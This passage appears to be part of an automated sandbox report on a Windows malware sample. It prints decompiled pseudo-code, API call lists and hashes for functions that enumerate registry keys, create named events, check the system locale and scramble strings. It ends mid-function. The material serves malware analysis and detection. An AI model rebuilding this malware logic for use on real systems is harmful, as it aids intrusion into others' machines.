                              • Part of subcall function 006D4F6E: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 006D4FD9
                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 006D11D8
                            • wsprintfA.USER32 ref: 006D1208
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
                            • String ID:
                            • API String ID: 1825273115-0
                            • Opcode ID: 19423cf1ed3d7a8845c30e062e61be0ab6f7c9d74e4b8ca3ae4c9d278546a3ec
                            • Instruction ID: 8668d2acc4aaeee92904de8a052aa8c3b2a7c98c07db518ac945a6b23be4d1c7
                            • Opcode Fuzzy Hash: 19423cf1ed3d7a8845c30e062e61be0ab6f7c9d74e4b8ca3ae4c9d278546a3ec
                            • Instruction Fuzzy Hash: 2B51F971E45214BBDB20ABE4DC45BAE77ABAB0A700F14442BF101DB351D7B29A81CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D3EE9 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E006D3EE9(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E006D7A71(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E006D789E(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E006D7A71((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x6da318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                            0x006d3ef0
                            0x006d3ef7
                            0x006d3efc
                            0x006d3eff
                            0x006d3f06
                            0x006d3f09
                            0x006d3f0c
                            0x006d3f11
                            0x006d3f16
                            0x006d406a
                            0x006d406c
                            0x006d406e
                            0x006d4073
                            0x006d4073
                            0x006d3f1c
                            0x006d3f1f
                            0x006d3f22
                            0x006d3f24
                            0x006d3f24
                            0x006d3f28
                            0x00000000
                            0x00000000
                            0x006d3f2c
                            0x006d3f58
                            0x006d3f5d
                            0x006d3f5f
                            0x006d3f5f
                            0x006d3f62
                            0x006d3f65
                            0x006d3f65
                            0x006d3f67
                            0x00000000
                            0x006d3f32
                            0x006d3f34
                            0x006d3f53
                            0x006d3f53
                            0x006d3f6a
                            0x006d3f6a
                            0x006d3f6b
                            0x006d3f6b
                            0x006d3f6e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d3f6e
                            0x006d3f38
                            0x006d3f7f
                            0x006d3f83
                            0x006d405d
                            0x006d405f
                            0x006d405f
                            0x006d4060
                            0x006d4063
                            0x00000000
                            0x006d4063
                            0x006d3f8c
                            0x006d3f9d
                            0x006d3fa1
                            0x006d4059
                            0x00000000
                            0x006d4059
                            0x006d3fa7
                            0x006d3faa
                            0x006d3fae
                            0x006d3fb2
                            0x006d3fb7
                            0x006d404f
                            0x006d404f
                            0x00000000
                            0x006d4055
                            0x006d3fc2
                            0x006d3fcb
                            0x006d3fdf
                            0x006d3fe6
                            0x006d3ffb
                            0x006d4001
                            0x006d4009
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d400b
                            0x006d400b
                            0x006d400b
                            0x006d4012
                            0x006d401a
                            0x00000000
                            0x00000000
                            0x006d401c
                            0x006d4025
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d4027
                            0x006d4029
                            0x006d402c
                            0x006d402c
                            0x006d402f
                            0x006d4033
                            0x006d4036
                            0x006d403c
                            0x006d403f
                            0x006d4046
                            0x00000000
                            0x006d3fc2
                            0x006d3f3d
                            0x006d3f45
                            0x006d3f4b
                            0x006d3f4d
                            0x006d3f4d
                            0x006d3f50
                            0x006d3f52
                            0x00000000
                            0x006d3f52
                            0x006d3f2c
                            0x006d3f72
                            0x006d3f77
                            0x006d3f79
                            0x006d3f79
                            0x006d3f7c
                            0x006d3f7c
                            0x00000000

                            APIs
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 006D3FE6
                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 006D3FFB
                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 006D4012
                            • lstrlen.KERNEL32(69B25F45), ref: 006D4036
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                            • String ID:
                            • API String ID: 3214092121-3916222277
                            • Opcode ID: 03fa8a65408121f36c11572f22b335e5b4b4da6d93ec1f15d9bba5ebfd154946
                            • Instruction ID: daad343f161804fb1a7f05e67bfa96a729b2a2e65769644e2f99e04f304d6bc3
                            • Opcode Fuzzy Hash: 03fa8a65408121f36c11572f22b335e5b4b4da6d93ec1f15d9bba5ebfd154946
                            • Instruction Fuzzy Hash: 33516931E00218EBDF21DF99C884AEDBBB7EF55350F15805BE9199B311CB70AA42CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D797A Relevance: 7.6, APIs: 5, Instructions: 96synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D797A(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x6da310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x6da348; // 0xdcd5a8
				_t3 = _t8 + 0x6db87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E006D6702(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x6da34c, 1, 0, _t30);
					E006D789E(_t30);
				}
				_t12 =  *0x6da2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E006D3BF0(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E006D7256(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E006D5854(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}
















                            0x006d797b
                            0x006d7982
                            0x006d798c
                            0x006d7990
                            0x006d7996
                            0x006d79a5
                            0x006d79ac
                            0x006d79b0
                            0x006d79c2
                            0x006d79c4
                            0x006d79c4
                            0x006d79c9
                            0x006d79d0
                            0x006d7a27
                            0x006d7a27
                            0x006d7a2d
                            0x006d7a2f
                            0x006d7a2f
                            0x006d7a39
                            0x006d7a3d
                            0x006d7a4f
                            0x006d7a4f
                            0x006d7a53
                            0x006d7a59
                            0x006d7a59
                            0x00000000
                            0x006d79e0
                            0x006d79e0
                            0x006d79e7
                            0x00000000
                            0x00000000
                            0x006d79ee
                            0x006d79f6
                            0x006d79fa
                            0x006d79fe
                            0x006d79fe
                            0x006d7a06
                            0x006d7a0b
                            0x006d7a0f
                            0x006d7a13
                            0x006d7a68
                            0x006d7a6e
                            0x006d7a6e
                            0x006d7a21
                            0x006d7a25
                            0x006d7a5c
                            0x006d7a5e
                            0x006d7a61
                            0x006d7a61
                            0x00000000
                            0x006d7a5e
                            0x006d7a25
                            0x00000000
                            0x006d7a0f

                            APIs
                              • Part of subcall function 006D6702: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,014A9DE0,00000000,?,?,69B25F44,00000005,006DA00C,4D283A53,?,?), ref: 006D6738
                              • Part of subcall function 006D6702: lstrcpy.KERNEL32(00000000,00000000), ref: 006D675C
                              • Part of subcall function 006D6702: lstrcat.KERNEL32(00000000,00000000), ref: 006D6764
                            • CreateEventA.KERNEL32(006DA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,006D68D0,?,?,?), ref: 006D79BB
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • StrChrW.SHLWAPI(006D68D0,00000020,61636F4C,00000001,00000000,?,?,00000000,?,006D68D0,?,?,?), ref: 006D79EE
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,006D68D0,00000000,00000000,?,00000000,?,006D68D0,?,?,?), ref: 006D7A1B
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,006D68D0,?,?,?), ref: 006D7A49
                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,006D68D0,?,?,?), ref: 006D7A61
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 73268831-0
                            • Opcode ID: 5709108c9049c584825379866334b43862cd895a010b41b985415d0a5810c233
                            • Instruction ID: a747ebad95e4ee3c418a6130b2721000e450e3a03a4b51a41977cd839aaa02e5
                            • Opcode Fuzzy Hash: 5709108c9049c584825379866334b43862cd895a010b41b985415d0a5810c233
                            • Instruction Fuzzy Hash: 79212632D193119BC7315BA9AC44ABF73ABAB88710F0A112BF951DB344EB71CE008696
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040182F Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x403160 = _t1;
				if(_t1 != 0) {
					 *0x403170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E00401493(); // executed
					_t6 = _t4;
					HeapDestroy( *0x403160);
				}
				ExitProcess(_t6);
			}






                            0x00401830
                            0x00401839
                            0x0040183f
                            0x00401846
                            0x0040184f
                            0x00401854
                            0x0040185a
                            0x00401865
                            0x00401867
                            0x00401867
                            0x0040186e

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00401849
                            • GetCommandLineW.KERNEL32 ref: 00401854
                              • Part of subcall function 00401493: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004014C8
                              • Part of subcall function 00401493: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 0040150F
                              • Part of subcall function 00401493: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401537
                              • Part of subcall function 00401493: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401541
                              • Part of subcall function 00401493: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401554
                              • Part of subcall function 00401493: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401581
                              • Part of subcall function 00401493: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040159F
                            • HeapDestroy.KERNEL32 ref: 00401867
                            • ExitProcess.KERNEL32 ref: 0040186E
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                            • String ID:
                            • API String ID: 1863574965-0
                            • Opcode ID: 97b04516d4304a837a7655c5891b85a5ac373015af52e8364f4eed2c235b444e
                            • Instruction ID: c66274986b3ea6f1620f212ac01f8038ee2d29bdd939a4d2e60d119bbebbbe51
                            • Opcode Fuzzy Hash: 97b04516d4304a837a7655c5891b85a5ac373015af52e8364f4eed2c235b444e
                            • Instruction Fuzzy Hash: B7E0B671402720ABC3112FB1AF0CA4F3E28BB0A7527048536F605F22B1CB780A01CA9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2689 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(80000002), ref: 006D26E6
                            • SysAllocString.OLEAUT32(006D23DF), ref: 006D272A
                            • SysFreeString.OLEAUT32(00000000), ref: 006D273E
                            • SysFreeString.OLEAUT32(00000000), ref: 006D274C
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 77f32665d1788e367285b16446541713a6122041ffb6acc120745a44664efca5
                            • Instruction ID: 82c95505401e06be6df1e8d5b6892e444edd9a6b541245e3a1d6ce06555dba39
                            • Opcode Fuzzy Hash: 77f32665d1788e367285b16446541713a6122041ffb6acc120745a44664efca5
                            • Instruction Fuzzy Hash: B131F77690020AEFCB15CF98D8D48AE7BBABF58340B21842FE506DB350D7719981CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D155C Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D155C(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E006D7A71(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E006D789E(_v28);
							goto L17;
						}
						_t42 = E006D2331(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E006D789E(_v24);
						_v20 = _v16;
						_t47 = E006D7A71(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x6da30c, 0) == 0x102);
				goto L16;
			}

















                            0x006d155c
                            0x006d1576
                            0x006d1579
                            0x006d157c
                            0x006d157f
                            0x006d1582
                            0x006d1588
                            0x006d158c
                            0x006d1666
                            0x006d166a
                            0x006d166a
                            0x006d1595
                            0x006d159c
                            0x006d15a1
                            0x006d15a6
                            0x006d165b
                            0x006d165e
                            0x00000000
                            0x006d1664
                            0x006d15ac
                            0x006d15af
                            0x006d15b6
                            0x006d15c0
                            0x006d15c9
                            0x006d15cf
                            0x006d15d7
                            0x006d160f
                            0x006d1649
                            0x006d164f
                            0x006d1651
                            0x006d1651
                            0x006d1653
                            0x006d1656
                            0x00000000
                            0x006d1656
                            0x006d1624
                            0x006d1629
                            0x006d162d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d162d
                            0x006d15dc
                            0x006d15eb
                            0x00000000
                            0x00000000
                            0x006d15f0
                            0x006d15f9
                            0x006d15fc
                            0x006d1601
                            0x006d1606
                            0x006d15e1
                            0x006d15e1
                            0x00000000
                            0x006d15e1
                            0x006d160a
                            0x00000000
                            0x006d160a
                            0x006d15de
                            0x00000000
                            0x006d162f
                            0x006d163c
                            0x00000000

                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,006D68B1,?), ref: 006D1582
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • RegEnumKeyExA.KERNELBASE(?,?,?,006D68B1,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,006D68B1), ref: 006D15C9
                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,006D68B1,?,006D68B1,?,?,?,?,?,006D68B1,?), ref: 006D1636
                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,006D68B1,?), ref: 006D165E
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                            • String ID:
                            • API String ID: 3664505660-0
                            • Opcode ID: 70b6b8c5a11a8f2f8e6f462c2fa2ac8fbeab88ecdaaa967253c040918527609d
                            • Instruction ID: 56229c24c170fdcf9c19c4f6a289417047e13a5269d1dad3dd0a76e94ddb03e3
                            • Opcode Fuzzy Hash: 70b6b8c5a11a8f2f8e6f462c2fa2ac8fbeab88ecdaaa967253c040918527609d
                            • Instruction Fuzzy Hash: A9317C76C00119BBCF21AFA5DC849EEFBBAEB89700F20402BE511B6321D2B44E40DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D6821 Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                            Download Yara Rule
                            C-Code - Quality: 41%
                            			E006D6821(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E006D6413(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E006D14E2(_t23);
						}
					}
					return _t38;
				}
				_t26 = E006D1CE6(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x6da34c, 1, 0,  *0x6da3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E006D155C(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E006D2331(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E006D1544(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E006D797A( &_v32, _t39);
					goto L13;
				}
			}














                            0x006d6821
                            0x006d682e
                            0x006d6834
                            0x006d6835
                            0x006d6836
                            0x006d6837
                            0x006d6838
                            0x006d683c
                            0x006d6843
                            0x006d6848
                            0x006d684c
                            0x006d68d4
                            0x006d68d4
                            0x006d68d7
                            0x006d68d9
                            0x006d68e1
                            0x006d68e7
                            0x006d68ea
                            0x006d68ea
                            0x006d68e7
                            0x006d68f5
                            0x006d68f5
                            0x006d6858
                            0x006d685f
                            0x006d6861
                            0x006d6861
                            0x006d6878
                            0x006d687c
                            0x006d687f
                            0x006d688a
                            0x006d6891
                            0x006d6891
                            0x006d689a
                            0x006d689e
                            0x006d68ac
                            0x006d68a0
                            0x006d68a0
                            0x006d68a1
                            0x006d68a2
                            0x006d68a3
                            0x006d68a4
                            0x006d68a5
                            0x006d68a5
                            0x006d68b1
                            0x006d68b4
                            0x006d68b8
                            0x006d68ba
                            0x006d68ba
                            0x006d68c1
                            0x00000000
                            0x006d68c3
                            0x006d68c3
                            0x006d68d0
                            0x00000000
                            0x006d68d0

                            APIs
                            • CreateEventA.KERNEL32(006DA34C,00000001,00000000,00000040,?,?,74D0F710,00000000,74D0F730), ref: 006D6872
                            • SetEvent.KERNEL32(00000000), ref: 006D687F
                            • Sleep.KERNELBASE(00000BB8), ref: 006D688A
                            • CloseHandle.KERNEL32(00000000), ref: 006D6891
                              • Part of subcall function 006D155C: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,006D68B1,?), ref: 006D1582
                              • Part of subcall function 006D155C: RegEnumKeyExA.KERNELBASE(?,?,?,006D68B1,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,006D68B1), ref: 006D15C9
                              • Part of subcall function 006D155C: WaitForSingleObject.KERNEL32(00000000,?,?,?,006D68B1,?,006D68B1,?,?,?,?,?,006D68B1,?), ref: 006D1636
                              • Part of subcall function 006D155C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,006D68B1,?), ref: 006D165E
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                            • String ID:
                            • API String ID: 891522397-0
                            • Opcode ID: 5c534c6586518881ee7c19aa6f090aa9903e98a4dee2aa022b0e22bb357990be
                            • Instruction ID: f3c71342e47ca7615e97d59827c87cd88e4b40a8b68e5efb8c28ee91c2064aa1
                            • Opcode Fuzzy Hash: 5c534c6586518881ee7c19aa6f090aa9903e98a4dee2aa022b0e22bb357990be
                            • Instruction Fuzzy Hash: 5C219272D00229AFCB20AFE4D8858EE77ABAB48310B01442BFA11E7300D7759E459BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D78B3 Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D78B3(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
